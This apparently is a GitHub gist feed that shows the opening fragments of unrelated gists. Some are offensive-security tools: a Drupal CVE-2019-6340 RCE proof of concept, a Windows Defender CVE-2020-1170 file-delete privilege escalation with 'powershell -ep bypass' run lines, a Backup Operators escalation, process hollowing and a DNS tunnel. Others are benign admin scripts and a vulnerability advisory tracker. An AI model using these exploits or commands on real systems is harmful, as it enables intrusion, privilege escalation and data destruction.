@leonjza
leonjza / cve-2019-6340.py
Last active February 27, 2020 18:39
CVE-2019-6340
#!/usr/bin/env python3
# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
# 2019 @leonjza
# Technical details for this exploit are available at:
# https://www.drupal.org/sa-core-2019-003
# https://www.ambionics.io/blog/drupal8-rce
# https://twitter.com/jcran/status/1099206271901798400
@SwitHak
SwitHak / 20190730-TLP-WHITE_URGENT11_VxWorks.MD
Last active June 5, 2020 08:12
Tracking vendors responses to URGENT/11 VxWorks vulnerabilities (Last updated: 2020-02-21 1019 UTC)

Advisory (URGENT/11)

UPDATE (2019-10-02 1241 UTC)

General

Armis released new information about the scope of the vulnerabilities. They impact more RTOSes than expected.

IP Stacks backstory

  • Some of the vulnerabilities discovered by Armis don't reside in the VxWorks RTOS itself but in one part of it, the IP stack. This IP stack, named IPNET, comes from Interpeak AB, a company acquired on 20 March 2006 by Wind River, the vendor of the VxWorks RTOS.
  • Before being acquired by Wind River, Interpeak AB sold IP stacks to several of its customers. It sold 2 major IP stacks named IPNET and IPLITE; IPLITE is a light version of IPNET.
//https://decoder.cloud/2018/02/12/the-power-of-backup-operatos/
//https://github.com/decoder-it/BadBackupOperator/blob/master/SuBackup/SuBackup/SuBackup.cpp
//https://docs.microsoft.com/en-us/windows/win32/services/writing-a-servicemain-function
//https://docs.microsoft.com/en-us/windows/win32/vds/loading-vds
//Replace system command with your code. If DewIt() does not run, check if the vds service is running, it should be on-demand.
#define UNICODE
#include <windows.h>
#include <stdio.h>
#include <Psapi.h>
@3xocyte
3xocyte / resolve_domain_computers.py
Last active July 23, 2020 22:34
get /etc/hosts entries for computers in Active Directory
#!/usr/bin/env python
# resolve domain computers by @3xocyte
import argparse
import sys
import string
# requires dnspython and ldap3
import dns.resolver
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE
@gwillcox-r7
gwillcox-r7 / DefenderArbitraryFileDelete.ps1
Created July 13, 2020 20:20
Windows Defender CVE-2020-1170 LPE Work Archive
# Taken from https://github.com/itm4n/CVEs/blob/master/CVE-2020-1170/DefenderArbitraryFileDelete.ps1 with minor modifications made where needed for Metasploit.
# All credits go to @itm4n for this PowerShell script!
# Testing
# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ZZ_SANDBOX\WER'"
# Real
# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ProgramData\Microsoft\Windows\WER'"
$JobCode = {
function DoMpCmdRunLogFileWriteTriggerJob {
@med0x2e
med0x2e / process-hollowing.cs
Last active November 4, 2021 12:49
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace Hollowing
{
public class Loader
{
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");
@radiantly
radiantly / README.md
Last active November 12, 2021 23:24 — forked from lifehome/README.md
Cloudflare API v4 Dynamic DNS Update in Bash

Cloudflare DDNS bash client with systemd

This is a bash script that acts as a Cloudflare DDNS client, a useful replacement for ddclient.

How to use?

  1. Put the cfupdater files in /usr/local/bin
  2. chmod +x /usr/local/bin/cfupdater
  3. Create a systemd service unit at /etc/systemd/system/, the cfupdate.service is shown as an example.
  4. Create a systemd timer unit at the same location of the service unit, the cfupdate.timer is shown as an example.
  5. sudo systemctl enable cfupdate.timer
  6. sudo systemctl start cfupdate.timer
@bja2142
bja2142 / gist:e60cb46b358d74c4801d5ae05fa76c07
Created August 17, 2022 21:37
Kill all users who are using more than a fixed limit of processes on Linux
MAX_PROCESS_LIMIT=10
systemctl status user.slice |
egrep "user-[0-9]+\.slice" |
sed 's/.*user-\([0-9]*\).*/\1/' | # get uid
while read uid; do
test $uid -ne 0 && ( # ignore root
tasks=$(
systemctl status user-${uid}.slice |
grep -e Tasks 2>&1 |
sed 's/\w*Tasks: \([1-9][0-9]*\) (limit: [0-9]*)/\1/'
@eladshamir
eladshamir / DnsTunnel.cs
Created April 11, 2020 21:50
This simple program tunnels UDP DNS packets to a TCP port
using System;
using System.Net.Sockets;
using System.Net;
namespace DnsTunnel
{
class Program
{
static void OpenTunnel(int listenerPort, string targetHost, int targetPort)
{
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;
namespace ComAbandonment
{
public class ComAbandonment
{